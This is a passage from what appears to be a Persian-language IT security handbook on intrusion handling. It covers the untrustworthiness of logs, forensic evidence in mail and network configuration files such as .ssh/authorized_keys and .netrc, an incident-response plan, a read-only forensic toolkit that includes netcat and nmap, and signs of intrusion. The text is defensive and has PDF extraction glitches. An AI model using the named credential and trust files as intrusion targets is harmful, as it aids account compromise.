ﭘﻴﺎﻣﻬﺎﻱ ﺍﻧﺘﺨﺎﺏﻧﺸﺪﻩ ﺭﺍ ﻧﻴﺰ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ ﭘﻴﺎﻣﻬـﺎ ،ﻣﻄﻠـﺐ ﻣﻬﻤـﻲ ﺭﺍ ﺍﺯ ﺩﺳـﺖ
ﻧﻤﻲﺩﻫﻴﺪ.
ﺍﻋﺘﻤﺎﺩ
ﻻ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﻳﺎ ﺣﺬﻑ ﻛﻨﻨﺪ.
ﺑﻪ ﺛﺒﺘﻬﺎ ﺑﻄﻮﺭ ﻣﻄﻠﻖ ﺍﻋﺘﻤﺎﺩ ﻧﻜﻨﻴﺪ .ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺑﺪﺳﺖ ﻣﻲﺁﻭﺭﻧﺪ ،ﻣﻌﻤﻮ ﹰ
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻲ ﺩﺍﺭﺍﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﻳﺎ ﺩﺍﻧﺶ ﻛﺎﻓﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻜﺎﻧﻴﺰﻡ ﺛﺒﺖ ﺭﺍ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩ ﮐﺮﺩﻥ ﺷﻤﺎ ﺩﺳﺘﮑﺎﺭﻱ ﻛﻨﻨﺪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠ ﹺ
ﻳﺎ ﺩﻭﺭ ﺑﺰﻧﻨﺪ؛ ﻭ ﺍﻟﺒﺘﻪ ﺧﻄﺎﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﺳﻴﺴﺘﻤﻲ ﻧﻴﺰ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻋﺪﻡ ﺟﻤﻊﺁﻭﺭﻱ ﻭ ﺫﺧﻴﺮﺓ ﺻﺤﻴﺢ ﺛﺒﺘﻬﺎ ﺷـﻮﻧﺪ .ﺩﺭﻧﺘﻴﺠـﻪ
ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺛﺒﺖ ﻭ ﭘﻮﻳﺶ ﺍﺿﺎﻓﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ :ﺍﻳﻨﻜﻪ ﻣﺴﺌﻠﻪﺍﻱ ﺛﺒﺖ ﻧﺸﺪﻩ ﺩﻟﻴﻞ ﺑﺮ ﺁﻥ ﻧﻴﺴﺖ ﻛﻪ ﺍﺗﻔﺎﻕ ﻧﻴﻔﺘﺎﺩﻩ ﺍﺳﺖ.
ﺍﻟﺒﺘﻪ ﺛﺒﺖ ﺷﺪﻥ ﻳﻚ ﻣﺴﺌﻠﻪ ﻫﻢ ﻟﺰﻭﻣﹰﺎ ﺑﻪ ﻣﻌﻨﻲ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻧﺶ ﻧﻴﺴﺖ؛ ﭼﺮﺍﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺟﻢ ﻧﻜﺘﻪﺍﻱ ﺩﺭ ﺛﺒﺘﻬﺎ ﻗﺮﺍﺭ ﺩﻫﺪ ﺗﺎ ﺷـﻤﺎ ﺭﺍ
ﺍﺯ ﻣﺸﻜﻞ ﺍﺻﻠﻲ ﺩﻭﺭ ﻛﻨﺪ ﻳﺎ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ
ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺛﺒﺖ ،ﺁﮔﺎﻫﺎﻧﻪ ﻭ ﺑﺎ ﺗﺼﻤﻴﻢ ﻳﻚ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﺭ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭﻟﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﺭﺣﺎﻝ
ﺍﺟﺮﺍ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﺭﺍ ﻧﻴﺰ ﺛﺒﺖ ﻣﻲﻛﻨﺪ .ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﮔﺮﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺟﺮﻣـﺸﻨﺎﺳﻲ ﺭﺍﻳﺎﻧـﻪﺍﻱ -ﻫﻨـﺮ ﺧﻮﺍﻧـﺪﻥ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺭﺩﭘﺎﻫﺎﻱ ﺑﻪ ﺟﺎ ﻣﺎﻧﺪﻩ ﺍﺯ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ -ﭘﻴﺪﺍ ﺷﺪﻩ ﺍﺳﺖ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٣٠
ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺍﺑﺘﺪﺍ ﻭﺍﺿﺢ ﺑﻪ ﻧﻈﺮ ﻧﻴﺎﻳﺪ ،ﻭﻟﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﺗﻔﺎﻕ ﻧﺎﮔﻮﺍﺭﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ ،ﺑﺮﺧﻲ ﻓﺎﻳﻠﻬﺎ ﻫﺴﺘﻨﺪ ﻛﻪ ﺍﮔﺮ ﺑﺮﺍﻱ
ﻫﺮ ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺟﺪﺍﮔﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ،ﺩﺭ ﺍﻧﺠﺎﻡ ﺗﺤﻠﻴﻠﻬﺎ ﻛﻤﻚ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻭﺍﻗﻊ ﻓﺎﻳﻠﻬـﺎﻱ ﺛﺒـﺖ ﻭﺍﻗﻌـﻲ
ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﻳﻚ ﻣﻨﺒﻊ ﻣﻔﻴﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮ ﻣﻲﺑﺎﺷﻨﺪ.
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺣﺴﺎﺑﻬﺎﻱ ﺑﺮﺧﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﻧﺎﻣﻪﻫﺎﻱ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﻧﮕﻪ ﻣـﻲﺩﺍﺭﻧـﺪ .ﺍﮔـﺮ
ﻣﻬﺎﺟﻢ ﺍﺯ ﭼﻨﻴﻦ ﺣﺴﺎﺑﻲ ﻧﺎﻣﻪ ﺑﻔﺮﺳﺘﺪ ،ﺑﺮﺭﺳﻲ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺍﻃﻼﻋﺎﺕ ﻣﻔﻴـﺪﻱ ﺑﺪﻫـﺪ .ﺣـﺪﺍﻗﻞ ﺩﺭ
ﻳﻚ ﻣﻮﺭﺩ ﮔﺰﺍﺭﺵﺷﺪﻩ ،ﻳﻜﻨﻔﺮ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺴﺮﻭﻗﺔ ﻫﻤﻜﺎﺭﺵ ﻣﻲﺩﺯﺩﻳﺪ ،ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻟﻮ ﺭﻓـﺖ ﻛـﻪ
ﺩﺭ ﺑﺮﺭﺳﻴﻬﺎ ﻣﻌﻠﻮﻡ ﺷﺪ ﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻲﻓﺮﺳﺘﺎﺩﻩ ﺭﺍ ﺑﺎ ﻧﺎﻡ ﺧﻮﺩﺵ ﺍﻣﻀﺎ ﻣﻲﻛﺮﺩﻩ ﺍﺳﺖ!
ﺗﻨﻈﻴﻤﺎﺕ ﺷﺒﻜﻪ
ﺣﺴﺎﺏ ﻫﺮ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﭼﻨﺪﻳﻦ ﻓﺎﻳﻞ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺒﻜﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣﻴـﺎﻧﺒﺮ ٣٤١ﺑـﺮﺍﻱ ﺻـﺪﻭﺭ
ﺩﺳﺘﻮﺭﺍﺕ ﻳﺎ ﺍﻋﻤﺎﻝ ﺣﻘﻮﻕ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺮﻧﺨﻲ ﺑﺎﺷﺪ ﺑـﺮﺍﻱ ﺭﺩﮔﻴـﺮﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﻳﻚ ﺗﺒﻬﻜﺎﺭ .ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺩﺭ Unixﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ .ssh/known_hosts ، .rhostsﻭ .ssh/authorized_keysﺑﺮﺍﻱ
ﻭﺭﻭﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻭ ﻓﺎﻳﻞ .netrcﺑﺮﺍﻱ .FTPﺩﺭ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﺪﻧﺒﺎﻝ ﺳﺮﻧﺦ ﺑﮕﺮﺩﻳﺪ ،ﻭﻟﻲ ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ ﻣﻮﺟـﻮﺩ ﺩﺭ
ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺑﻮﻁ ﺑﻪ ﻗﺒﻞ ﺍﺯ ﺣﻤﻠﻪ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﮔﻤﺮﺍﻩ ﻛﺮﺩﻥ ﺷﻤﺎ ﺩﺭ ﺁﻧﺠﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ.
ﺭﺳﻴﺪﮔﻲ ﺑﻪ ﻧﻔﻮﺫ
ﺷﻤﺎ ﺑﺎﻳﺪ ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺑﻄﻮﺭ ﺍﻋﻢ ،ﻫﻤﺔ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ
ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﭼﻨﻴﻦ ﻃﺮﺣﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﻣﺆﻟﻔﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺍﻳﻦ ﻃﺮﺡ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻣﺆﻟﻔﺔ :٤ﺍﺯ ﺩﺭﺳﺘﻲ ﺗﺸﺨﻴﺺ ﺧﻮﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﺎﻳﻴﺪ
ﺑﻌﺪ ﺍﺯ ﻣﻬﺎﺭ ﺻﺪﻣﺎﺕ ،ﺗﺸﺨﻴﺺ ﺧﻮﺩ ﺍﺯ ﻣﺸﻜﻞ ﺭﺍ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺎﻧﻴﺪ ﻭ ﺧﺴﺎﺭﺍﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ .ﺁﻳﺎ ﺑﻌﺪ ﺍﺯ ﺍﺧـﺮﺍﺝ ﻛﺎﺭﻣﻨـﺪ ﻫﻨـﻮﺯ ﻫـﻢ
ﻓﺎﻳﻠﻬﺎ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ؟ ﺷﻤﺎ ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺻﺪ ﺩﺭﺻﺪ ﺍﺯ ﺍﺭﺗﺒﺎﻁ ﺩﻭ ﻳﺎ ﭼﻨﺪ ﻭﺍﻗﻌﻪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻧﺘﻮﺍﻧﻴﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺗﻤﺎﻡ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ.
ﺍﮔﺮ ﻗﺼﺪ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺭﺧﺪﺍﺩ ﺭﺍ ﺩﺍﺭﻳﺪ ﻳﺎ ﺑﺪﻧﺒﺎﻝ ﺟﺒﺮﺍﻥ ﻗﺎﻧﻮﻧﻲ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷﻲ ﺍﺯ ﺁﻥ ﻫﺴﺘﻴﺪ ﺑﺎﻳﺪ ﻗﺒـﻞ ﺍﺯ ﻫـﺮ ﻋﻤـﻞ ﺩﻳﮕـﺮ ﺳـﻌﻲ ﺩﺭ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻻﺯﻡ ﻛﻨﻴﺪ .ﻋﺪﻡ ﻣﻮﻓﻘﻴﺖ ﺩﺭ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻧﺒﺎﻳﺪ ﻣﺎﻧﻊ ﺍﺯ ﺗﻤﺎﺱ ﺷﻤﺎ ﺑﺎ ﭘﻠﻴﺲ ﻭ ﺗﺸﻜﻴﻞ ﭘﺮﻭﻧﺪﻩ ﻋﻠﻴﻪ ﻳﻚ ﻣﻈﻨﻮﻥ
ﺷﻮﺩ ،ﺍﻣﺎ ﻛﻤﺒﻮﺩ ﻣﺪﺍﺭﻙ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻧﺲ ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﭘﺎﻳﻴﻦ ﺁﻭﺭﺩ .ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺣﻔﻆ ﻣﺪﺍﺭﻙ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺯﻣﺎﻧﮕﻴﺮ ﻭ ﻣﺸﻜﻞ ﺑﺎﺷﺪ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺳﺎﺩﻩ ﻫﻨﮕﺎﻡ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﺑﺎ ﻣﺸﻜﻼﺕ ﺑﻪ ﺍﻳﻦ ﻣﺆﻟﻔﻪ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ
ﻣﻲﺩﻫﻨﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﻳﻚ ﻃﺮﺡ ﻋﻤﻠﻴﺎﺗﻲ ،ﺑﺎ ﺩﺍﺷﺘﻦ ﻳﻚ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺭﻭﻱ ﻳﻚ ﺭﺳﺎﻧﺔ ﻓﻘﻂ ﺧﻮﺍﻧﺪﻧﻲ )ﻣﺜﻞ ﺩﻳﺴﻚ ﻓﻼﭘـﻲ ،ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ،ﻭ (...ﻣـﻲﺗﻮﺍﻧﻴـﺪ
ﺁﻣﺎﺩﮔﻲ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﻴﺪ .ﺍﻳﻦ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﻳﻜﺴﺮﻱ ﺑﺮﻧﺎﻣﺔ ﺩﺳﺘﻜﺎﺭﻱﻧﺸﺪﻩ ﺑﺮﺍﻱ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﺍﻗﻌـﻪ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺷـﻤﺎ ﻣـﻲﮔـﺬﺍﺭﺩ؛ ﭘـﺲ
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺭﺍ ﻛﻪ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﺩﺭ ﺁﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺑـﺮﺍﻱ ﻳـﻚ ﺳﻴـﺴﺘﻢ
Unixﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﻗﻼﻡ ﺯﻳﺮ ﺑﺎﺷﺪ:
awk, bash, cat, compress, cut, dd, des, df, du, file, find, grep, gzip, icat, ifconfig, last, ls, lsmod,
lsof, md5sum, modinfo, more, netcat, netstat, nmap, paste, pcat, perl, pgp, pkginfo, ps, rpm, rm,
script, sed, strings, strace, tar, top, truss, uncompress, vi, and w.
ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﻣﺸﺘﺮﻙ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ )ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﺍﻳﺴﺘﺎ ﭘﻴﻮﻧﺪ ﻧﻤﺎﻳﻴﺪ( .ﺩﺍﺷـﺘﻦ ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗﺎﺑـﻞ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺭﻭﻱ ﺁﻥ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ (http://www.knoppix.org) Knoppixﻳﻚ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺩﻡ ﺩﺳﺘﻲ ﻣﻨﺎﺳﺐ ﻣﺒﺘﻨﻲ ﺑﺮ Linux
ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻭ ﺟﺮﻣﺸﻨﺎﺳﻲ ﻧﻴﺰ ﺑﻪ ﻫﻤﺮﺍﻩ ﺧﻮﺩ ﺩﺍﺭﺩ .ﭼﻮﻥ Linuxﻣﻲﺗﻮﺍﻧﺪ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ FATﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
ﻭ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻓﺎﻳﻞ Unixﺭﺍ mountﻛﻨﺪ ،ﻳﻚ ﺩﻳﺴﻚ ﻓﺸﺮﺩﺓ Knoppixﺟﻌﺒﻪﺍﺑﺰﺍﺭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪﻱ ﻣﻲﺑﺎﺷﺪ.
ﻛﺸﻒ ﻳﻚ ﺗﻬﺎﺟﻢ
ﭼﻨﺪ ﺣﺎﻟﺖ ﺑﺮﺍﻱ ﻣﻄﻠﻊﺷﺪﻥ ﺍﺯ ﻳﻚ ﺗﻬﺎﺟﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺍﺑﺮﻛـﺎﺭﺑﺮ ﺍﺯ ﻳـﻚ ﻛـﺎﻓﻲﻧـﺖ ﺩﺭ ﺑﻮﺩﺍﭘـﺴﺖ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﺪﻩ، ﻣﺠﺮﻡ ﺭﺍ ﺣﻴﻦ ﺍﺭﺗﻜﺎﺏ ﺟﺮﻡ ﺑﮕﻴﺮﻳﺪ .ﻣﺜ ﹰ •
ﺩﺭﺣﺎﻟﻴﻜﻪ ﺷﻤﺎ ﺗﻨﻬﺎ ﻛﺴﻲ ﻫﺴﺘﻴﺪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩﻩ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺪﺍﻧﺪ؛
ﻼ ﻳﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻳﺎﻓﺘﻲ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺗﻲ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺭﺥ ﺩﺍﺩﻩ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﻧﻔﻮﺫ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﺍﺳﺖ .ﻣﺜ ﹰ •
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻬﺎﺟﻢ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻮﺭﺩ ﻭﺟﻮﺩ ﻳﻚ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﺩﺳﺖ ﻣﻲﺍﻧﺪﺍﺯﺩ ،ﻳـﺎ ﺑـﺎ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﺟﺪﻳـﺪﻱ
ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻳﺪ؛
ﭘﻴﻐﺎﻣﻲ ﺍﺯ ﺭﺍﻫﺒﺮ ﻳﻚ ﺷﺒﻜﺔ ﺩﻳﮕﺮ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻣﻲﮔﻮﻳﺪ ﺩﺭ ﺷﺒﻜﺔ ﻭﻱ ﻧﺸﺎﻧﻬﺎﻳﻲ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻋﺎﺩﻱ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ •
ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﺮﭼﺸﻤﻪ ﮔﺮﻓﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛
٤٣٣ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﺗﻔﺎﻗﺎﺕ ﻏﻴﺮﻋﺎﺩﻱ ﻣﻲﺑﻴﻨﻴﺪ ،ﻣﺜﻞ ﻛﻨﺪﻱ ﺷـﺪﻳﺪ ﺷـﺒﻜﻪ ،ﺧـﺮﺍﺏﺷـﺪﻧﻬﺎﻱ ﻧﺎﮔﻬـﺎﻧﻲ ،ﻓﻌﺎﻟﻴـﺖ ﺷـﺪﻳﺪ ﺩﻳـﺴﻚ ﺳـﺨﺖ، •
ﺭﺍﻩﺍﻧﺪﺍﺯﻳﻬﺎﻱ ﻣﺠﺪﺩ ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﻫﻴﭻ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﻩ ،ﻧﺎﻫﻤﺨﻮﺍﻧﻴﻬﺎﻱ ﺟﺰﺋﻲ ﺩﺭ ﻣﺤﺎﺳﺒﺎﺕ ﺯﻣﺎﻧﻬﺎﻱ ﺍﺗﺼﺎﻝ ﻛﺎﺭﺑﺮﺍﻥ ،ﭘﺎﺳﺨﻬﺎﻱ ﺑـﺎ
ﺗﺄﺧﻴﺮ ﺯﻳﺎﺩ ،ﻭ . . .
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻨﻮﻋﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﺎﻳﻠﻬﺎ ﻭ ﭘﺮﺩﺍﺯﻩﻫﺎ ﺭﺍ ﺑﺮﺍﻱ ﻛﺸﻒ ﻧﻔﻮﺫﻫﺎ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻄـﻮﺭ
ﻣﻨﻈﻢ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺼﻮﺭﺕ ﺧﺎﺭﺝ ﺍﺯ ﺭﻭﺍﻝ ﻋﺎﺩﻱ ﺍﺟﺮﺍ ﻛﻨﻴﺪ .ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﻳﻚ ﻋﻨـﺼﺮ ﺗـﺼﺎﺩﻓﻲ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻩﺍﻳـﺪ ﻛـﻪ ﻣـﺎﻧﻊ ﻣـﻲﺷـﻮﺩ
